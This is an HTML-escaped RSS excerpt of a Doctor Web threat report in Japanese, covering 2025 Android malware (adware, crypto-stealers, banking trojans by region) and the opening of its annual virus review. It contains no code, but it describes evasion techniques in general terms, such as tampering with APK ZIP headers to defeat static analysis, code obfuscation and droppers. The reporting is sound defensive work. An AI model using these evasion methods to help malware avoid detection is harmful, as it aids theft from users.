    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/13_Android.HiddenAds.4213_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/13_Android.HiddenAds.4213_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;アプリ「Time Shift Cam」と「Fusion Collage Editor」は &lt;b&gt;Android.HiddenAds&lt;/b&gt; ファミリーに属するアドウェア型トロイの木馬だった &lt;/em&gt;&lt;/p&gt;

&lt;p&gt;仮想通貨を盗むよう設計されたトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.CoinSteal&amp;lng=ja"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.202&lt;/b&gt;、&lt;a href="https://vms.drweb.co.jp/search/?q=Android.CoinSteal&amp;lng=ja"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.203&lt;/b&gt;、&lt;a href="https://vms.drweb.co.jp/search/?q=Android.CoinSteal&amp;lng=ja"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.206&lt;/b&gt; も発見されています。これらは仮想通貨取引所Dydxの公式アプリや、ブロックチェーンプラットフォームRaydiumとAerodrome Financeの公式アプリを装って拡散されていました。&lt;/p&gt;

&lt;div class="img img-two mb-3"&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/14_Android.CoinSteal.203_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/14_Android.CoinSteal.203_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/15_Android.CoinSteal.202_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/15_Android.CoinSteal.202_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;「Raydium」と「Dydx Exchange」に偽装した、仮想通貨を盗むトロイの木馬&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;これら悪意のあるアプリは、起動されると仮想通貨ウォレットにアクセスするためと称してニーモニックフレーズを入力するようユーザーに求めます。実際には、入力されたデータは攻撃者に送信されます。なかには、別の仮想通貨プラットフォームからの要求を装った入力フォームが表示される場合もありました。&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/16_seed_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/16_seed_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/17_seed_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/17_seed_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;仮想通貨取引所PancakeSwapを装ったフィッシングフォームを表示させ、仮想通貨ウォレットにアクセスするためのニーモニックフレーズを入力するようユーザーに要求する &lt;b&gt;Android.CoinSteal.206&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;2025年を通して、80を超える悪意のある &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Joker&amp;lng=ja"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; アプリが発見されています。これらはユーザーを有料サービスに登録するトロイの木馬で、メッセンジャーや写真アプリ、システムツール、画像編集アプリ、ドキュメント管理アプリなどといったさまざまなアプリを装って拡散されていました。&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/18_Android.Joker.2494_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/18_Android.Joker.2494_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/19_Android.Joker.2496_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/19_Android.Joker.2496_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;発見された &lt;b&gt;Android.Joker&lt;/b&gt; トロイの木馬の例：&lt;b&gt;Android.Joker.2494&lt;/b&gt; はメッセンジャー「File Text Messages」を装って拡散され、&lt;b&gt;Android.Joker.2496&lt;/b&gt; はスマートフォンの動作を最適化するユーティリティ「Useful Cleaner」に偽装していた&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;さまざまな詐欺スキームに用いられる &lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; 偽アプリも引き続きあらゆるものが拡散されています。これらトロイの木馬の主な目的はWebサイトを開くことです。その一部は金融関連アプリに偽装して、フィッシングサイトや、投資またはオンライン収入関連を装った詐欺サイトを開きます。また別の一部はゲームを装って拡散されていました。このタイプの &lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; は特定の条件下でゲームとして機能する代わりにオンラインカジノやブックメーカーのサイトを開く場合があります。Google Playでは100を超えるそのようなアプリが発見されています。&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/20_Android.FakeApp.1840_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/20_Android.FakeApp.1840_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/21_Android.FakeApp.1863_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/21_Android.FakeApp.1863_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt; 偽アプリの例：トルコのユーザーを標的とした預金や収入を管理できるとうたうアプリ「TPAO」に潜んだトロイの木馬 &lt;b&gt;Android.FakeApp.1863&lt;/b&gt; と、ゲーム「Pino Bounce」を装って拡散されオンラインカジノのサイトを開く場合のあるトロイの木馬 &lt;b&gt;Android.FakeApp.1840&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;新たなアドウェアもDoctor Webのウイルスアナリストによって発見されています。&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.Adpush&amp;lng=ja"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21912&lt;/b&gt; と名づけられたアドウェアは仮想通貨に関する情報を提供するアプリ「Coin News Promax」に隠されていました。 &lt;a href="https://vms.drweb.co.jp/search/?q=Adware.Adpush&amp;lng=ja"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21912&lt;/b&gt; は通知を表示させ、その通知がクリックされるとС2サーバーによって指定されたリンクをWebView内で開きます。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/22_Adware.Adpush.21912_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/22_Adware.Adpush.21912_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Google Playで提供されているアプリ「Coin News Promax」にはアドウェア &lt;b&gt;Adware.Adpush.21912&lt;/b&gt; が潜んでいた&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;そのほか、望ましくないアプリケーション &lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeMoney&amp;lng=ja"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt; も発見されました。&lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeMoney&amp;lng=ja"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt; は「Zeus Jackpot Mania」というアプリを装って拡散されており、このアプリでユーザーはゲームをプレイして仮想報酬を獲得し、現金化して引き出すことができるとされています。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/23_Program.FakeMoney.16_1_Zeus Jackpot Mania_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/23_Program.FakeMoney.16_1_Zeus Jackpot Mania_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;「Zeus Jackpot Mania」は望ましくないアプリケーション &lt;b&gt;Program.FakeMoney.16&lt;/b&gt; だった&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;ユーザーは現金を「引き出す」ためにいくつか情報を提供するよう要求されますが、最終的にお金を受け取ることはありません。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/24_Program.FakeMoney.16_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/24_Program.FakeMoney.16_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;ユーザーに氏名と銀行口座情報を提供するよう求める &lt;b&gt;Program.FakeMoney.16&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;バンキング型トロイの木馬&lt;/h3&gt;

&lt;p&gt;Dr.Web Security Space for mobile devices（モバイルデバイス 向けDr.Web Security Space）によって収集された検出統計によると、2025年に検出されたバンキング型トロイの木馬のマルウェア検出数全体に占める割合は2024年の6.29%をわずかに上回る6.94%となりました。その活動は第1四半期を通じてほぼ横ばいで推移しましたが、第2四半期の初めには大幅な増加がみられました。その後は緩やかに減少に転じ、7月に年間最低数を記録しています。8月を境に再び増加に転じ、10月にピークに達した後、2025年の終わりには再び減少が確認されています。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/26_banker_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/26_banker_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;2025年にも、よく知られたバンキング型トロイの木馬のファミリーが再び攻撃に使用されました。なかでも活発に拡散されていたのが、&lt;b&gt;Android.Banker.Mamont&lt;/b&gt;、&lt;a href="https://vms.drweb.ru/search/?q=Android.BankBot.Coper&amp;lng=ja" target="_blank"&gt;Coper&lt;/a&gt;、&lt;b&gt;Android.BankBot.Ermac&lt;/b&gt; などです。そのほか、&lt;a href="https://vms.drweb.ru/virus/?i=29204494" target="_blank"&gt;NGate&lt;/a&gt; トロイの木馬の新たなバージョンも発見されています。これはNFC技術を悪用して金銭を窃取するトロイの木馬で、感染させたデバイスのNFCチップからデータを攻撃者に送信することにより、ATMで被害者の口座から勝手にお金を引き出したり、非接触型決済（タッチ決済）で被害者の関与なしに不正に支払いを行ったりできるようにします。最も多く検出された亜種は、&lt;b&gt;Android.Banker.NGate.8&lt;/b&gt;、&lt;b&gt;Android.Banker.NGate.17&lt;/b&gt;、&lt;b&gt;Android.Banker.NGate.5.origin&lt;/b&gt; でした。&lt;/p&gt;

&lt;p&gt;スパイウェア機能を備えた &lt;b&gt;Android.SpyMax&lt;/b&gt; も引き続き拡散されています。&lt;b&gt;Android.SpyMax&lt;/b&gt; はRAT（リモートアクセス型トロイの木馬）であるSpyNoteの流出したソースコードをベースにしたトロイの木馬で、スパイウェアとしてのみでなくバンキング型トロイの木馬としても使用されています。ただし、バンキング型トロイの木馬の検出数全体に占める &lt;b&gt;Android.SpyMax&lt;/b&gt; の割合は2024年の32.04%から12.35%へと減少しており、活動には低下がみられます。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/27_Android.SpyMax_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/27_Android.SpyMax_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;2025年にロシアのユーザー間で最も多く拡散されたバンキング型トロイの木馬は広範なMamontファミリーに属するもので（&lt;b&gt;Android.Banker.790.origin&lt;/b&gt;、&lt;b&gt;Android.Banker.Mamont.3.origin&lt;/b&gt;、&lt;b&gt;Android.Banker.Mamont.28.origin&lt;/b&gt; など）、これにはマルウェア作成者が意欲的に改変や開発を続けている多種多様な悪意のあるアプリが含まれています。これらのアプリはクレジットカード会社からのワンタイムコードを含んだSMSを傍受し、バンクカード情報などの機密情報を窃取します。&lt;/p&gt;

&lt;p&gt;ウズベキスタンとその近隣諸国（アルメニア、アゼルバイジャン、キルギス共和国）のユーザーを標的としたバンキング型トロイの木馬の活動も観測されました。最も多く検出されたのは、銀行から送信されるSMSから認証コードを盗む &lt;b&gt;Android.Banker.951.origin&lt;/b&gt;、&lt;b&gt;Android.Banker.881.origin&lt;/b&gt;、&lt;b&gt;Android.Banker.963.origin&lt;/b&gt; などのトロイの木馬です。これらトロイの木馬は、より検出されにくくなるよう常に改良され続けています。トルコのユーザーを襲ったバンキング型トロイの木馬の中で最も多く検出されたのも、同じくSMSの内容を盗むトロイの木馬 &lt;b&gt;Android.BankBot.Coper.12.origin&lt;/b&gt;、&lt;b&gt;Android.Banker.5685&lt;/b&gt;、&lt;b&gt;Android.Banker.864.origin&lt;/b&gt; でした。&lt;/p&gt;

&lt;p&gt;イランのユーザーは &lt;b&gt;Android.BankBot.1190.origin&lt;/b&gt; や、&lt;b&gt;Android.BankBot.1191.origin&lt;/b&gt; とその亜種による攻撃を受けました。これらバンキング型トロイの木馬は、被害者のバンクカード、口座、残高、取引などといった金融情報をSMSから盗み出し、攻撃者に送信します。また、電話帳から連絡先情報を収集し、攻撃者から受け取るコマンドに従ってSMSを送信する機能も備えています。&lt;/p&gt;

&lt;p&gt;インドネシアや韓国を含む東南アジアおよびアジア太平洋地域の多くの国では &lt;b&gt;Android.BankBot.Remo.1.origin&lt;/b&gt; による攻撃が観測されました。このトロイの木馬はAndroidのアクセシビリティサービス（ユーザー補助機能）を悪用して、感染させたデバイスにインストールされている銀行アプリや仮想通貨ウォレットからデータを窃取します。韓国のユーザーはこのRemoトロイの木馬に加えて &lt;b&gt;Android.BankBot.15140&lt;/b&gt;、&lt;b&gt;Android.BankBot.Ermac.6.origin&lt;/b&gt;、そして GoldDigger（&lt;b&gt;Android.BankBot.GoldDigger.9&lt;/b&gt;、&lt;b&gt;Android.BankBot.GoldDigger.11&lt;/b&gt;）による攻撃も受けました。&lt;/p&gt;

&lt;p&gt;GoldDiggerはインドネシアとタイのユーザーに対する攻撃にも使用されています。インドネシアとマレーシアのユーザーはバンキング型トロイの木馬 &lt;b&gt;Android.BankBot.Gigabud.1.origin&lt;/b&gt; の標的となりました。日本では引き続きトロイの木馬MoqHaoファミリーが拡散され、なかでも &lt;b&gt;Android.Banker.672.origin&lt;/b&gt;、&lt;b&gt;Android.Banker.5063&lt;/b&gt;、&lt;b&gt;Android.Banker.740.origin&lt;/b&gt; といった亜種が多く検出されています。 &lt;/p&gt;

&lt;p&gt;インドのユーザーを襲ったバンキング型トロイの木馬の1つは &lt;b&gt;Android.Banker.6209&lt;/b&gt; でした。このトロイの木馬は正規銀行アプリの外観を模倣して、被害者の氏名、バンクカード番号、セキュリティコード（CVV）などの情報を窃取します。また、&lt;b&gt;Android.Banker.814.origin&lt;/b&gt; や &lt;b&gt;Android.Banker.913.origin&lt;/b&gt;、&lt;b&gt;Android.Banker.5132&lt;/b&gt; などのRewardStealバンキング型トロイの木馬も依然として活発です。これらはインドの大手金融機関（ICICI銀行、SBI、アクシス銀行、PM Kisanなど）と関連があるように見せかけたアプリに偽装して被害者の金融情報を盗むトロイの木馬です。&lt;/p&gt;

&lt;p&gt;ブラジルでは、&lt;b&gt;Android.BankBot.1183.origin&lt;/b&gt; のほか、&lt;b&gt;Android.Banker.NGate.8&lt;/b&gt;、&lt;b&gt;Android.Banker.NGate.9&lt;/b&gt;、&lt;b&gt;Android.Banker.NGate.14&lt;/b&gt; などのNGateファミリーに属するバンキング型トロイの木馬が最も多く拡散されました。&lt;/p&gt;

&lt;p&gt;2025年にも、マルウェア作成者はAndroid向けバンキング型トロイの木馬を解析や検出から保護しようとあらゆるテクニックを駆使し続けています。とりわけ人気なのが、「DEX to C（実行可能DEXコードをC言語コードに変換する）」などの、コードを難読化したり隠したりする手法です。NP Managerユーティリティを使用して悪意のあるアプリを難読化する手法も広く用いられています。&lt;/p&gt;

&lt;p&gt;AndroidのAPKファイルである ZIPアーカイブの形式に手を加える手口も根強い人気を誇っています。これには、APKファイルのローカルファイルヘッダ内のフィールド &lt;span class="string"&gt;compression method&lt;/span&gt; と &lt;span class="string"&gt;compressed size&lt;/span&gt; を改変するという方法や、ECDR（End of Central Directory Record：中央ディレクトリの終わりレコード）とCD（ファイルやアーカイブパラメータに関するデータが格納される中央ディレクトリ）内のディスクに関する情報を誤ったものにするという方法などがあります。これらの手法に関しては2024年のモバイルマルウェアレビュー内「&lt;a href="https://news.drweb.co.jp/show/review/?lng=ru&amp;i=14970#troj" target="_blank"&gt;バンキング型トロイの木馬&lt;/a&gt;」セクションにて詳述しています。こうした改変が加えられた後もトロイの木馬アプリは変わらず完璧に動作しますが、多くの静的解析ツールはそれらを破損したものと認識してしまうため正しく処理できなくなります。&lt;/p&gt;

&lt;p&gt;Google Playのプロテクト機能回避などを目的に、メインのペイロードを隠蔽するためのドロッパーが使用されるケースも増えています。また、バンキング型トロイの木馬のコード記述にAIアシスタントが利用されるようになっており、このことがマルウェアの開発を簡易化し、新たなファミリーの出現に拍車をかけています。そのほか、バンキング型トロイの木馬の操作と感染させたデバイスからのデータの盗み出しにTelegramボットが使用されるケースも目立つようになっています。&lt;/p&gt;

&lt;h3&gt;今後の動向と展望&lt;/h3&gt;

&lt;p&gt;2025年には、依然として最も多く検出されるAndroid脅威である広告を表示するトロイの木馬の活動が活発化し、フィッシングや金銭窃取などの詐欺目的で使用されるさまざまな偽アプリも再び広く拡散されました。バンキング型トロイの木馬による攻撃も増加の一途をたどっています。これら悪意のあるアプリはサイバー犯罪者にとっての不正な収益源であることからその人気はいまだ衰えを知らず、2026年にも引き続き最も多く使用されるツールの1つとなる可能性が極めて高いでしょう。また、バンキング型トロイの木馬の操作にTelegramボットを使用するケースが増えてきており、この傾向は今後も続くものと考えられます。&lt;/p&gt;

&lt;p&gt;スマートフォンやTVボックスセットのファームウェア内でトロイの木馬ファミリー &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Vo1d&amp;lng=ja"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; と &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Triada&amp;lng=ja"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; の新たな亜種や、&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Clipper.31&amp;lng=ja"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; が発見される事例もありました。このことから、攻撃者は検出を極めて複雑で困難なものにするような方法でマルウェアを拡散することに引き続き熱意を注いでいるということが見てとれます。この傾向は2026年も続き、スマートフォン、TVボックスセット、そしてその他さまざまなAndroidデバイスにマルウェアがプリインストールされる新たな事例が発生するものと予想されます。&lt;/p&gt;

&lt;p&gt;より広範なタスクを実行できる一層高度かつ精巧なマルウェアが登場することも予測され、これには新たなバックドアやさまざまなスパイウェア型トロイの木馬が含まれるでしょう。Google Playなどの公式アプリストアは今後もマルウェアや望ましくないアプリの拡散源として悪用される可能性が高いと考えられます。&lt;/p&gt;

&lt;p&gt;2026年にも、攻撃者は作成したツールを保護するためのあらゆる技術を引き続き積極的に組み込んでくるものと予想されます。コードの記述にAIアシスタントを活用するケースも増加するものとみられ、新たなファミリーの出現を助長する要因となるでしょう。&lt;/p&gt;

&lt;p&gt;Doctor Webではモバイルデバイスを狙うサイバー脅威の進化と状況を監視し続け、新たな脅威の出現に迅速に対応してまいります。悪意のあるプログラムや危険なプログラムからお使いのデバイスを守るため、Dr.Web Security Space for mobile devices（モバイルデバイス向けDr.Web Security Space）をインストールすることをお勧めします。&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/2025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Indicators of compromise（セキュリティ侵害インジケーター）&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.co.jp/show/?i=15102&amp;lng=ja</guid><title>2025年のウイルスレビュー</title><link>https://news.drweb.co.jp/show/?i=15102&amp;lng=ja&amp;c=5</link><pubDate>Thu, 22 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;2026年1月22日&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;2025年には、広告を表示させるトロイの木馬が最も多く検出された脅威の1つとなりました。さまざまな悪意のあるスクリプトや、感染させたシステム上で別のマルウェアを起動させるトロイの木馬プログラムも多く検出されています。メールトラフィック内では、ダウンローダ型トロイの木馬、バックドア、エクスプロイト、悪意のあるスクリプト、そしてフィッシングドキュメントが最も多く検出されました。&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;モバイルデバイスでは、広告を表示させるトロイの木馬とならんで、さまざまな詐欺スキームに用いられる偽アプリが最も多く検出された脅威となりました。バンキング型トロイの木馬の活動も増加しています。また、Google Playでは数十もの新たな悪意のあるアプリ、望ましくないアプリ、アドウェアアプリがDoctor Webのウイルスアナリストによって発見されました。&lt;/p&gt;

&lt;p&gt;2025年にテクニカルサポートに寄せられたファイルの復号化リクエスト数は2024年と比較して減少しました。一方で、Telegramアカウントを盗む目的で作成された詐欺サイト数の増加がインターネットアナリストによって確認され、悪質な金融関連サイトも引き続き多く観測されています。&lt;/p&gt;

&lt;p&gt;2025年には、複数の標的型攻撃に関してDoctor Webのアンチウイルスラボによる調査が行われました。そのうちの1つはロシアの機械工学系企業を標的とした攻撃で、脅威アクターは複数の悪意のあるツールを使用することで、感染させたコンピューターから機密情報を取得しようと試みています。Doctor Webのエキスパートにより、この攻撃の背後にいるのはハッカー集団「Scaly Wolf」であるということが特定されました。また別のインシデントはハッカー集団「Cavalry Werewolf」がロシア政府機関を攻撃したというものです。この攻撃に関する調査では脅威アクターによって使用されていた多数のツールが特定され、Cavalry Werewolfの特徴やこのハッカー集団が侵害されたネットワーク内で実行する典型的なアクションについても明らかにしています。&lt;/p&gt;

&lt;p&gt;2025年を通して、Doctor Webではその他の情報セキュリティインシデントについても記事を公開してきました。1月には複数の異なるマルウェアを使用して仮想通貨Moneroをマイニングするアクティブなキャンペーンが発見され、4月には複数の安価なAndroidスマートフォンモデルのファームウェア内に埋め込まれた、仮想通貨を窃取するトロイの木馬について注意を喚起しました。同じく4月には、ロシア軍関係者をスパイする目的で使用されていた、人気の地図アプリの改変版に埋め込まれたAndroid向けトロイの木馬も発見されています。&lt;/p&gt;

&lt;p&gt;7月、Doctor Webは仮想通貨とパスワードを盗むよう設計された新たなトロイの木馬ファミリーについて報告しました。これらトロイの木馬はゲームのmodやパッチ、チートに偽装して拡散されていました。8月にはロシア企業の従業員を標的に拡散されていたモバイルデバイス向けの多機能バックドアについて注意を喚起しています。サイバー犯罪者はこのマルウェアを遠隔操作し、機密情報の窃取や被害者に対するスパイ活動を行っていました。&lt;/p&gt;

&lt;p&gt;10月には、メッセンジャーアプリTelegram Xの改変版に埋め込まれて拡散されていたAndroidデバイス向けバックドアが発見されました。このバックドアはTelegramアカウントのログインIDとパスワードをはじめとする機密情報を盗みます。このバックドアを使用することで、脅威アクターはハッキングしたアカウントを乗っ取るだけでなくメッセンジャーそのものを完全にコントロールし、ユーザーに成り代わってさまざまな操作を密かに実行することが可能です。&lt;/p&gt;

&lt;p&gt;12月、Doctor Webはサイトのボット対策機能にブロックされないよう人間になりすましてサイトの人気度を人為的に高めるトロイの木馬について記事を公開しました。このマルウェアは脅威アクターから受け取ったパラメータに基づいて検索エンジン内で目的のサイトを自動的に検索して開き、そのWebページ上でユーザーの操作を模倣してクリックを実行します。&lt;/p&gt;

&lt;p&gt;また2025年には、悪意のあるアクターがソーシャルエンジニアリング手法でユーザーを騙し、デバイス上で悪意のあるコードを実行させるClickFix攻撃の急増が確認されました。&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;2025年の主な傾向&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;広告を表示させるトロイの木馬の活動が活発化&lt;/li&gt;
        &lt;li&gt;新たな標的型攻撃が発生&lt;/li&gt;
        &lt;li&gt;ClickFix手法を用いた攻撃が流行&lt;/li&gt;
        &lt;li&gt;ランサムウェアによって暗号化されたファイルの復号化リクエスト数が減少&lt;/li&gt;
        &lt;li&gt;Android向けバンキング型トロイの木馬の検出数が増加&lt;/li&gt;
        &lt;li&gt;Androidデバイスのファームウェア感染の新たな事例を観測&lt;/li&gt;
        &lt;li&gt;引き続きGoogle Playからさまざまな悪意のあるアプリや望ましくないアプリが拡散される&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;2025年の最も注目すべきイベント&lt;/h3&gt;

&lt;p&gt;2025年1月、Doctor Webのスペシャリストは悪意のあるマイナーSilentCryptoMinerを使用して仮想通貨Moneroをマイニングするキャンペーンを&lt;a href="https://news.drweb.co.jp/show/?i=14976&amp;lng=ja" target="_blank"&gt;発見しました&lt;/a&gt;。SilentCryptoMinerのファイルはビデオ通話アプリなどのさまざまなソフトウェアに偽装して拡散され、コンピューターを感染させるとそこにインストールされている他のマイナーを削除します。このキャンペーンが進行するうちに、攻撃者は一部の悪意のあるコンポーネントの拡散に、ある情報を別の情報（画像など）の中に埋め込んで隠す手法であるステガノグラフィを用いるようになりました。特殊な方法で作成された画像がダウンロードされた後、そこからSilentCryptoMinerコンポーネントが抽出されて起動されます。&lt;/p&gt;

&lt;p&gt;4月、Doctor Webは複数の安価なAndroidスマートフォンモデルのファームウェア内で発見されたトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Clipper.31&amp;lng=ja"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; について記事を&lt;a href="https://news.drweb.co.jp/show/?i=15002&amp;lng=ja" target="_blank"&gt;公開しました&lt;/a&gt;。脅威アクターはまずこのトロイの木馬をメッセージングアプリWhatsAppの改変版に組み込み、次にAndroidスマートフォンメーカーのサプライチェーンを侵害することで、そのトロイの木馬化されたWhatsAppをスマートフォンにプリインストールしています。 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Clipper.31&amp;lng=ja"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; はWhatsApp内で送受信されるメッセージを傍受し、仮想通貨TronおよびEthereumのウォレットアドレス形式に一致する文字列を検出してそれらを攻撃者のアドレスに置き換えます。同時に、置き換えに気づかれることのないようユーザーに対しては正しいウォレットアドレスを表示させます。&lt;/p&gt;

&lt;p&gt;4月下旬、Doctor Webのエキスパートは地図アプリ「AlpineQuest」の一部のバージョンに埋め込まれてロシア軍関係者をスパイする目的で使用されていたトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Spy.1292.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; を&lt;a href="https://news.drweb.co.jp/show/?i=15006&amp;lng=ja" target="_blank"&gt;発見しました&lt;/a&gt;。このトロイの木馬は感染したデバイスから機密情報を収集するほか、攻撃者がファイルを盗むことも可能にします。&lt;/p&gt;

&lt;p&gt;7月、Doctor Webは仮想通貨やパスワードを盗むよう設計されたトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Scavenger&amp;lng=ja"&gt;&lt;b&gt;Trojan.Scavenger&lt;/b&gt;&lt;/a&gt; について記事を&lt;a href="https://news.drweb.co.jp/show/?i=15036&amp;lng=ja" target="_blank"&gt;公開しました&lt;/a&gt;。このトロイの木馬はゲームのmodやチート、パッチなどに偽装して拡散され、DLL検索順序ハイジャッキング脆弱性を悪用するなどの方法で正規ソフトウェアを利用して起動されます。&lt;/p&gt;

